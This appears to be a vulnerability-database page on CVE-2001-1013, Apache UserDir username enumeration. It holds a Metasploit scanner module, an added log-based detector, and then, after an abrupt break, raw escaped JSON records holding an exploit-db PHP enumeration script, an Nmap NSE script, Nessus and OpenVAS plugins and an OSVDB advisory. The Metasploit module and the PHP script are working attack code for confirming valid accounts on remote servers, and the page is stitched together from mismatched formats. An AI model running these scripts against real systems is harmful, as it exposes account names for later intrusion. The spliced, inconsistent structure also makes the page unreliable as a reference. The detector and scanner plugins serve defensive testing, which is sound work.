ID MSF:AUXILIARY/SCANNER/HTTP/APACHE_USERDIR_ENUM Type metasploit Reporter Rapid7 Modified 2017-07-24T13:26:21
Description
Apache with the UserDir directive enabled returns a different error code for a username that exists but has no public_html directory than for a username that does not exist, which could allow remote attackers to determine valid usernames on the server.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::AuthBrute

  def initialize
    super(
      'Name'        => 'Apache "mod_userdir" User Enumeration',
      'Description' => %q{Apache with the UserDir directive enabled generates different error
        codes when a username exists and there is no public_html directory and when the username
        does not exist, which could allow remote attackers to determine valid usernames on the
        server.},
      'Author'      =>
        [
          'Heyder Andrade <heyder.andrade[at]alligatorteam.org>',
        ],
      'References'  =>
        [
          ['BID', '3335'],
          ['CVE', '2001-1013'],
          ['OSVDB', '637'],
        ],
      'License'     => MSF_LICENSE
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The path to users Home Page', '/']),
        OptPath.new('USER_FILE', [ true, "File containing users, one per line",
          File.join(Msf::Config.data_directory, "wordlists", "unix_users.txt") ]),
      ])

    # Only the username half of AuthBrute is used here, so the password-related
    # options it registers are removed again.
    deregister_options(
      'PASSWORD',
      'PASS_FILE',
      'USERPASS_FILE',
      'STOP_ON_SUCCESS',
      'BLANK_PASSWORDS',
      'USER_AS_PASS'
    )
  end

  def run_host(ip)
    @users_found = {}

    each_user_pass { |user,pass|
      do_login(user)
    }

    if(@users_found.empty?)
      print_status("#{full_uri} - No users found.")
    else
      print_good("#{full_uri} - Users found: #{@users_found.keys.sort.join(", ")}")
      report_note(
        :host  => rhost,
        :port  => rport,
        :proto => 'tcp',
        :sname => (ssl ? 'https' : 'http'),
        :type  => 'users',
        :data  => {:users => @users_found.keys.join(", ")}
      )
    end
  end

  def do_login(user)
    vprint_status("#{full_uri}~#{user} - Trying UserDir: '#{user}'")
    uri = normalize_uri(target_uri.path)
    payload = "#{uri}~#{user}/"
    begin
      res = send_request_cgi!(
        {
          'method' => 'GET',
          'uri'    => payload,
          'ctype'  => 'text/plain'
        }, 20)

      return unless res
      # 403 (account exists but has no readable public_html) and 200 both mean the
      # username is valid; any other status is reported as not found.
      if ((res.code == 403) or (res.code == 200))
        print_good("#{full_uri} - Apache UserDir: '#{user}' found ")
        @users_found[user] = :reported
      else
        vprint_status("#{full_uri} - Apache UserDir: '#{user}' not found ")
      end
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
    rescue ::Timeout::Error, ::Errno::EPIPE
    end
  end
end
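Defender-side companion to the module above, added here and not part of the Metasploit module or the Rapid7 project: it parses Apache combined-format access log lines (constructed for this example) and flags a client that requests many distinct "/~user" paths within a short span, listing the names that came back 200 or 403 as the accounts such a sweep would have confirmed. The thresholds `min_users` and `window` are assumed values.

```ruby
require 'time'

# Constructed Apache "combined" log lines for this example: one client sweeps
# eight "~user" paths in a few seconds, a second client just browses normally.
SAMPLE_LOG = <<~LOG
  203.0.113.5 - - [24/Jul/2017:13:26:21 +0000] "GET /~root/ HTTP/1.1" 403 199 "-" "Mozilla/4.0"
  203.0.113.5 - - [24/Jul/2017:13:26:21 +0000] "GET /~bin/ HTTP/1.1" 404 196 "-" "Mozilla/4.0"
  203.0.113.5 - - [24/Jul/2017:13:26:22 +0000] "GET /~daemon/ HTTP/1.1" 404 199 "-" "Mozilla/4.0"
  203.0.113.5 - - [24/Jul/2017:13:26:22 +0000] "GET /~admin/ HTTP/1.1" 404 198 "-" "Mozilla/4.0"
  203.0.113.5 - - [24/Jul/2017:13:26:23 +0000] "GET /~www-data/ HTTP/1.1" 403 203 "-" "Mozilla/4.0"
  203.0.113.5 - - [24/Jul/2017:13:26:23 +0000] "GET /~test/ HTTP/1.1" 404 197 "-" "Mozilla/4.0"
  203.0.113.5 - - [24/Jul/2017:13:26:24 +0000] "GET /~alice/ HTTP/1.1" 200 1421 "-" "Mozilla/4.0"
  203.0.113.5 - - [24/Jul/2017:13:26:24 +0000] "GET /~guest/ HTTP/1.1" 404 198 "-" "Mozilla/4.0"
  198.51.100.7 - - [24/Jul/2017:13:27:02 +0000] "GET /index.html HTTP/1.1" 200 3104 "-" "Mozilla/5.0"
  198.51.100.7 - - [24/Jul/2017:13:27:05 +0000] "GET /~alice/cv.pdf HTTP/1.1" 200 88210 "http://example.test/" "Mozilla/5.0"
LOG

# The fields of a combined-log line that the detector needs.
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>\S+) (?<path>\S+)[^"]*" (?<status>\d{3})/
# A mod_userdir request: "/~name", "/~name/" or "/~name/anything".
USERDIR_RE = %r{\A/~([^/?]+)}

def parse_line(line)
  m = LOG_RE.match(line)
  return nil unless m
  {
    ip: m[:ip],
    time: Time.strptime(m[:ts], '%d/%b/%Y:%H:%M:%S %z'),
    path: m[:path],
    status: m[:status].to_i
  }
end

# Returns one alert per client IP that requested at least `min_users` distinct
# "~user" paths inside any `window`-second span. 200 and 403 are the statuses the
# scanner treats as "account exists", so those names are listed as likely valid.
def detect_userdir_enum(log, min_users: 5, window: 60)
  by_ip = Hash.new { |h, k| h[k] = [] }
  log.each_line do |line|
    e = parse_line(line)
    next unless e
    user = e[:path][USERDIR_RE, 1]
    next unless user
    by_ip[e[:ip]] << e.merge(user: user)
  end

  alerts = []
  by_ip.each do |ip, events|
    events.sort_by! { |e| e[:time] }
    in_window = Hash.new(0) # user -> hits currently inside the sliding window
    start = 0
    burst = false
    events.each do |e|
      in_window[e[:user]] += 1
      # Move the left edge forward until the window spans at most `window` seconds.
      while e[:time] - events[start][:time] > window
        old = events[start][:user]
        in_window[old] -= 1
        in_window.delete(old) if in_window[old].zero?
        start += 1
      end
      if in_window.size >= min_users
        burst = true
        break
      end
    end
    next unless burst

    valid = events.select { |e| [200, 403].include?(e[:status]) }.map { |e| e[:user] }.uniq.sort
    alerts << {
      ip: ip,
      probes: events.size,
      distinct_users: events.map { |e| e[:user] }.uniq.size,
      not_found: events.count { |e| e[:status] == 404 },
      likely_valid: valid
    }
  end
  alerts
end

if __FILE__ == $0
  detect_userdir_enum(SAMPLE_LOG).each do |a|
    puts "#{a[:ip]}: #{a[:probes]} userdir probes, #{a[:distinct_users]} names, " \
         "#{a[:not_found]} x 404; likely valid accounts: #{a[:likely_valid].join(', ')}"
  end
end
```

Feed it a real access log with `detect_userdir_enum(File.read('access.log'))`; the `likely_valid` list is what an incident responder needs to know which accounts were confirmed to exist.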
script_dependencies(\"nmap_nse_net.nasl\");\n script_mandatory_keys(\"Tools/Launch/nmap_nse_net\");\n\n script_add_preference(name:\"http.pipeline\", value:\"\", type:\"entry\");\n script_add_preference(name:\"http.useragent\", value:\"\", type:\"entry\");\n script_add_preference(name:\"http-max-cache-size\", value:\"\", type:\"entry\");\n\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"nmap.inc\");\n\n\nphase = 0;\nif (defined_func(\"scan_phase\")) {\n phase = scan_phase();\n}\n\nif (phase == 1) {\n # Get the preferences\n argv = make_array();\n\n pref = script_get_preference(\"http.pipeline\");\n if (!isnull(pref) && pref != \"\") {\n argv[\"http.pipeline\"] = string('\"', pref, '\"');\n }\n pref = script_get_preference(\"http.useragent\");\n if (!isnull(pref) && pref != \"\") {\n argv[\"http.useragent\"] = string('\"', pref, '\"');\n }\n pref = script_get_preference(\"http-max-cache-size\");\n if (!isnull(pref) && pref != \"\") {\n argv[\"http-max-cache-size\"] = string('\"', pref, '\"');\n }\n nmap_nse_register(script:\"http-vmware-path-vuln\", args:argv);\n} else if (phase == 2) {\n res = nmap_nse_get_results(script:\"http-vmware-path-vuln\");\n foreach portspec (keys(res)) {\n output_banner = 'Result found by Nmap Security Scanner (http-vmware-path-vuln.nse) http://nmap.org:\\n\\n';\n if (portspec == \"0\") {\n security_message(data:output_banner + res[portspec], port:0);\n } else {\n v = split(portspec, sep:\"/\", keep:0);\n proto = v[0];\n port = v[1];\n security_message(data:output_banner + res[portspec], port:port, protocol:proto);\n }\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2020-07-21T19:26:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-1013", "CVE-2009-3733"], "description": "Checks for a path-traversal vulnerability in VMWare ESX, ESXi, and Server (CVE-2009-3733).\n\nThe vulnerability was originally released by Justin Morehouse and 
Tony Flick, who presented at\nShmoocon 2010 (see reference).\n\nSYNTAX:\n\nhttp.pipeline: If set, it represents the number of HTTP requests that", "modified": "2020-07-07T00:00:00", "published": "2011-06-01T00:00:00", "id": "OPENVAS:1361412562310104150", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310104150", "type": "openvas", "title": "Nmap NSE net: http-vmware-path-vuln", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Autogenerated NSE wrapper\n#\n# Authors:\n# NSE-Script: Ron Bowes\n# NASL-Wrapper: autogenerated\n#\n# Copyright:\n# NSE-Script: The Nmap Security Scanner (http://nmap.org)\n# Copyright (C) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.104150\");\n script_version(\"2020-07-07T14:13:50+0000\");\n script_cve_id(\"CVE-2001-1013\");\n script_bugtraq_id(3335);\n script_tag(name:\"last_modification\", value:\"2020-07-07 14:13:50 +0000 (Tue, 07 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-06-01 16:32:46 +0200 (Wed, 01 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Nmap NSE net: http-vmware-path-vuln\");\n script_category(ACT_INIT);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_copyright(\"Copyright (C) 2011 NSE-Script: The Nmap Security Scanner; NASL-Wrapper: Greenbone Networks GmbH\");\n script_family(\"Nmap NSE net\");\n\n script_xref(name:\"URL\", value:\"http://fyrmassociates.com/tools.html\");\n\n script_tag(name:\"summary\", value:\"Checks for a path-traversal vulnerability in VMWare ESX, ESXi, and Server (CVE-2009-3733).\n\nThe vulnerability was originally released by Justin Morehouse and Tony Flick, who presented at\nShmoocon 2010 (see reference).\n\nSYNTAX:\n\nhttp.pipeline: If set, it represents the number of HTTP requests that'll be\npipelined (ie, sent in a single request). 
This can be set low to make\ndebugging easier, or it can be set high to test how a server reacts (its\nchosen max is ignored).\n\nhttp-max-cache-size: The maximum memory size (in bytes) of the cache.\");\n\n script_tag(name:\"solution_type\", value:\"Mitigation\");\n\n script_tag(name:\"deprecated\", value:TRUE);\n\n exit(0);\n}\n\nexit(66);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "exploitdb": [{"lastseen": "2016-02-02T15:42:00", "description": "Red Hat Linux 7.0 Apache Remote Username Enumeration Vulnerability. CVE-2001-1013. Remote exploit for linux platform", "published": "2001-09-12T00:00:00", "type": "exploitdb", "title": "Red Hat Linux 7.0 Apache Remote Username Enumeration Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2001-1013"], "modified": "2001-09-12T00:00:00", "id": "EDB-ID:21112", "href": "https://www.exploit-db.com/exploits/21112/", "sourceData": "source: http://www.securityfocus.com/bid/3335/info\r\n\r\nVersions of Apache webserver shipping with Red Hat Linux 7.0 (and possibly other Apache distributions) install with a default misconfiguration which could allow remote users to determine whether a give username exists on the vulnerable system.\r\n\r\nhttp://www.example.com/~<username>\r\n\r\nWhen a remote user makes a request for a possible user's default home page, the server returns one of three responses:\r\n\r\nIn a case where <username> is a valid user account, and has been configured with a homepage, the server responds with the user's homepage.\r\n\r\nWhen <username> exists on the system, but has not been assigned a homepage document, the server returns the message \"You don't have permission to access /~username on this server.\"\r\n\r\nHowever, if the tested username does not exist as an account on the system, the Apache server's response includes the message \"The requested URL /~username was not found on this server.\"\r\n\r\nBecause the server responds differently in the latter two cases, a 
remote user can test and enumerate possible usernames. Properly exploited, this information could be used in further attacks on the vulnerable hos\r\n\r\n#!/usr/local/bin/php -q\r\n<?\r\n/*\r\ndefault misconfiguration which could allow remote users\r\nto determine whether a give username exists on the vulnerable system.\r\n\r\n By Gabriel A Maggiotti\r\n */\r\n\r\n\r\n if( $argc!=4)\r\n {\r\n echo \"usagge: $argv[0] <host> <userlist> <delay>\\n\";\r\n return 1;\r\n }\r\n\r\n\r\n$host=$argv[1];\r\n$userlist=$argv[2];\r\n\r\n\r\n$fd = fopen ($userlist, \"r\");\r\nwhile (!feof ($fd)) {\r\n $user = fgets($fd, 4096);\r\n \r\n $fp = fsockopen ($host, 80 , &$errno, &$errstr, 30);\r\n fputs ($fp, \"GET /~$user HTTP/1.0\\r\\n\\r\\n\");\r\n while (!feof ($fp)) {\r\n $sniff=fgets($fp,1024);\r\n if(strpos($sniff,\"permission\")!=\"\") {\r\n echo \"$user exists!!!\\n\";\r\n break;\r\n }\r\n }\r\n fclose ($fp);\r\n sleep(3);\r\n}\r\n\r\nfclose ($fd);\r\n\r\n?>\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/21112/"}], "nmap": [{"lastseen": "2019-05-30T17:06:01", "description": "Attempts to enumerate valid usernames on web servers running with the mod_userdir module or similar enabled. \n\nThe Apache mod_userdir module allows user-specific directories to be accessed using the http://example.com/~user/ syntax. This script makes http requests in order to discover valid user-specific directories and infer valid usernames. By default, the script will use Nmap's `nselib/data/usernames.lst`. An HTTP response status of 200 or 403 means the username is likely a valid one and the username will be output in the script results along with the status code (in parentheses). \n\nThis script makes an attempt to avoid false positives by requesting a directory which is unlikely to exist. If the server responds with 200 or 403 then the script will not continue testing it. 
\n\nCVE-2001-1013: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1013.\n\n## Script Arguments \n\n#### http-userdir-enum.limit \n\nThe maximum number of users to check.\n\n#### http-userdir-enum.users \n\nThe filename of a username list.\n\n#### slaxml.debug \n\nSee the documentation for the slaxml library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the http library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n## Example Usage \n \n \n nmap -sV --script=http-userdir-enum <target>\n\n## Script Output \n \n \n 80/tcp open http syn-ack Apache httpd 2.2.9\n |_ http-userdir-enum: Potential Users: root (403), user (200), test (200)\n\n## Requires \n\n * datafiles\n * http\n * nmap\n * shortport\n * stdnse\n * string\n * table\n\n* * *\n", "edition": 7, "published": "2009-08-22T22:04:32", "title": "http-userdir-enum NSE Script", "type": "nmap", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-1013"], "modified": "2017-03-24T22:05:51", "id": "NMAP:HTTP-USERDIR-ENUM.NSE", "href": "https://nmap.org/nsedoc/scripts/http-userdir-enum.html", "sourceData": "local datafiles = require \"datafiles\"\nlocal http = require \"http\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\n\ndescription = [[\nAttempts to enumerate valid usernames on web servers running with the mod_userdir\nmodule or similar enabled.\n\nThe Apache mod_userdir module allows user-specific directories to be accessed\nusing the http://example.com/~user/ syntax. This script makes http requests in\norder to discover valid user-specific directories and infer valid usernames. By\ndefault, the script will use Nmap's\n<code>nselib/data/usernames.lst</code>. 
An HTTP response\nstatus of 200 or 403 means the username is likely a valid one and the username\nwill be output in the script results along with the status code (in parentheses).\n\nThis script makes an attempt to avoid false positives by requesting a directory\nwhich is unlikely to exist. If the server responds with 200 or 403 then the\nscript will not continue testing it.\n\nCVE-2001-1013: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1013.\n]]\n\n---\n-- @args http-userdir-enum.users The filename of a username list.\n-- @args http-userdir-enum.limit The maximum number of users to check.\n--\n-- @output\n-- 80/tcp open http syn-ack Apache httpd 2.2.9\n-- |_ http-userdir-enum: Potential Users: root (403), user (200), test (200)\n\nauthor = \"jah\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"auth\", \"intrusive\"}\n\n\n\nportrule = shortport.http\n\nlocal function fail (err) return stdnse.format_output(false, err) end\n\naction = function(host, port)\n local limit = stdnse.get_script_args(SCRIPT_NAME .. '.limit')\n\n if(not nmap.registry.userdir) then\n init()\n end\n local usernames = nmap.registry.userdir\n\n -- speedy exit if no usernames\n if(#usernames == 0) then\n return fail(\"Didn't find any users to test (should be in nselib/data/usernames.lst)\")\n end\n\n -- Identify servers that answer 200 to invalid HTTP requests and exit as these would invalidate the tests\n local status_404, result_404, known_404 = http.identify_404(host,port)\n if ( status_404 and result_404 == 200 ) then\n stdnse.debug1(\"Exiting due to ambiguous response from web server on %s:%s. 
All URIs return status 200.\", host.ip, port.number)\n return nil\n end\n\n -- Check if we can use HEAD requests\n local use_head = http.can_use_head(host, port, result_404)\n\n -- Queue up the checks\n local all = {}\n local i\n for i = 1, #usernames, 1 do\n if(nmap.registry.args.limit and i > tonumber(nmap.registry.args.limit)) then\n stdnse.debug1(\"Reached the limit (%d), stopping\", nmap.registry.args.limit)\n break;\n end\n\n if(use_head) then\n all = http.pipeline_add(\"/~\" .. usernames[i], nil, all, 'HEAD')\n else\n all = http.pipeline_add(\"/~\" .. usernames[i], nil, all, 'GET')\n end\n end\n\n local results = http.pipeline_go(host, port, all)\n\n -- Check for http.pipeline error\n if(results == nil) then\n stdnse.debug1(\"http.pipeline returned nil\")\n return fail(\"http.pipeline returned nil\")\n end\n\n local found = {}\n for i, data in pairs(results) do\n if(http.page_exists(data, result_404, known_404, \"/~\" .. usernames[i], true)) then\n stdnse.debug1(\"Found a valid user: %s\", usernames[i])\n table.insert(found, usernames[i])\n end\n end\n\n if(#found > 0) then\n return string.format(\"Potential Users: %s\", table.concat(found, \", \"))\n elseif(nmap.debugging() > 0) then\n return \"Didn't find any users!\"\n end\n\n return nil\nend\n\n\n\n---\n-- Parses a file containing usernames (1 per line), defaulting to\n-- \"nselib/data/usernames.lst\" and stores the resulting array of usernames in\n-- the registry for use by all threads of this script. This means file access\n-- is done only once per Nmap invocation. init() also adds a random string to\n-- the array (in the first position) to attempt to catch false positives.\n-- @return nil\n\nfunction init()\n local customlist = stdnse.get_script_args(SCRIPT_NAME .. 
'.users')\n local read, usernames = datafiles.parse_file(customlist or \"nselib/data/usernames.lst\", {})\n if not read then\n stdnse.debug1(\"%s\", usernames or \"Unknown Error reading usernames list.\")\n nmap.registry.userdir = {}\n return nil\n end\n -- random dummy username to catch false positives (not necessary)\n-- if #usernames > 0 then table.insert(usernames, 1, randomstring()) end\n nmap.registry.userdir = usernames\n stdnse.debug1(\"Testing %d usernames.\", #usernames)\n return nil\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "nessus": [{"lastseen": "2021-03-01T01:24:18", "description": "When configured with the 'UserDir' option, requests to URLs containing\na tilde followed by a username will redirect the user to a given\nsubdirectory in the user home.\n\nFor instance, by default, requesting /~root/ displays the HTML\ncontents from /root/public_html/.\n\nIf the username requested does not exist, then Apache will reply with\na different error code. 
Therefore, an attacker may exploit this\nvulnerability to guess the presence of a given user name on the remote\nhost.", "edition": 29, "cvss3": {"score": 5.3, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"}, "published": "2001-09-18T00:00:00", "title": "Apache UserDir Directive Username Enumeration", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-1013"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:apache:http_server"], "id": "APACHE_USERNAME.NASL", "href": "https://www.tenable.com/plugins/nessus/10766", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(10766);\n script_version(\"1.42\");\n script_cvs_date(\"Date: 2018/06/29 12:01:03\");\n\n script_cve_id(\"CVE-2001-1013\");\n script_bugtraq_id(3335);\n\n script_name(english:\"Apache UserDir Directive Username Enumeration\");\n script_summary(english:\"Checks for the error codes returned by Apache when requesting a nonexistent user name\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apache server can be used to guess the presence of a given\nuser name on the remote host.\");\n script_set_attribute(attribute:\"description\", value:\n\"When configured with the 'UserDir' option, requests to URLs containing\na tilde followed by a username will redirect the user to a given\nsubdirectory in the user home.\n\nFor instance, by default, requesting /~root/ displays the HTML\ncontents from /root/public_html/.\n\nIf the username requested does not exist, then Apache will reply with\na different error code. 
Therefore, an attacker may exploit this\nvulnerability to guess the presence of a given user name on the remote\nhost.\");\n script_set_attribute(attribute:\"solution\", value:\"In httpd.conf, set the 'UserDir' to 'disabled'.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2000/07/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2001/09/18\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:http_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n script_copyright(english:\"This script is Copyright (C) 2001-2018 Tenable Network Security, Inc.\");\n\n script_dependencie(\"apache_http_version.nasl\");\n script_require_keys(\"installed_sw/Apache\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nget_install_count(app_name:\"Apache\", exit_if_zero:TRUE);\nport = get_http_port(default:80);\ninstall = get_single_install(app_name:\"Apache\", port:port);\n\nr = http_send_recv3(method:\"GET\",item:\"/~root\", port:port);\nif (isnull(r)) exit(0);\ncode = ereg_replace(pattern:\"^HTTP/[0-9.]+ ([0-9]+) .*\", string: r[0], 
replace:\"\\1\");\nif ( ! code ) exit(0);\n\nr = http_send_recv3(method:\"GET\", item:\"/~admin\", port:port);\nif (isnull(r)) exit(0);\ncode2 = ereg_replace(pattern:\"^HTTP/[0-9.]+ ([0-9]+) .*\", string: r[0], replace:\"\\1\");\nif ( ! code2 ) exit(0);\n\nr = http_send_recv3(method:\"GET\", item:\"/~\" + rand_str(length:8), port:port);\nif (isnull(r)) exit(0);\ncode3 = ereg_replace(pattern:\"^HTTP/[0-9.]+ ([0-9]+) .*\", string: r[0], replace:\"\\1\");\nif ( ! code3 ) exit(0);\n\n\nif ( code != code3 || code2 != code3 ) security_warning(port);\nelse audit(AUDIT_LISTEN_NOT_VULN, \"Apache\", port, install[\"version\"]);", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "osvdb": [{"lastseen": "2017-04-28T13:19:55", "bulletinFamily": "software", "cvelist": ["CVE-2001-1013"], "edition": 1, "description": "## Vulnerability Description\nApache web servers contain a flaw that may lead to an unauthorized information disclosure. The issue is triggered when the UserDir module is enabled and a remote attacker requests access to a user's home directory. By monitoring the web server response, an attacker is able to enumerate valid user names, resulting in a loss of confidentiality.\n## Solution Description\nCurrently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround(s): \n\nWorkaround 1: Disable the default-enabled UserDir directive in httpd.conf:\nUserDir Disabled\n\nWorkaround 2: Set generic error pages for 403/404 messages in httpd.conf.\n## Short Description\nApache web servers contain a flaw that may lead to an unauthorized information disclosure. The issue is triggered when the UserDir module is enabled and a remote attacker requests access to a user's home directory. 
By monitoring the web server response, an attacker is able to enumerate valid user names, resulting in a loss of confidentiality.\n## Manual Testing Notes\nhttp://[victim]/~<username>\n\nHTTP result code 200 - User root exists and you should be able to view root's homepage. \n\nHTTP result code 403 - You receive the following error message, \"You don't have permission to access /~root on this server\" because Apache cannot read root's directory or files. \n\nHTTP result code 404 - You receive the following error message, \"The requested URL /~nosuchuser was not found on this server.\" because \"nosuchuser\" does not exist on the system.\n## References:\nVendor URL: http://httpd.apache.org/\nOther Advisory URL: http://www.securiteam.com/unixfocus/5WP0C1F5FI.html\n[Nessus Plugin ID:10766](https://vulners.com/search?query=pluginID:10766)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2001-09/0103.html\nMail List Post: http://marc.theaimsgroup.com/?l=vuln-dev&m=96297636413302&w=2\nMail List Post: http://marc.theaimsgroup.com/?l=vuln-dev&m=96297697414539&w=2\nISS X-Force ID: 7129\nGeneric Exploit URL: http://packetstormsecurity.org/0407-exploits/getusr.c\n[CVE-2001-1013](https://vulners.com/cve/CVE-2001-1013)\nBugtraq ID: 3335\n", "modified": "2000-07-07T00:00:00", "published": "2000-07-07T00:00:00", "id": "OSVDB:637", "href": "https://vulners.com/osvdb/OSVDB:637", "title": "Apache HTTP Server UserDir Directive Username Enumeration", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}]}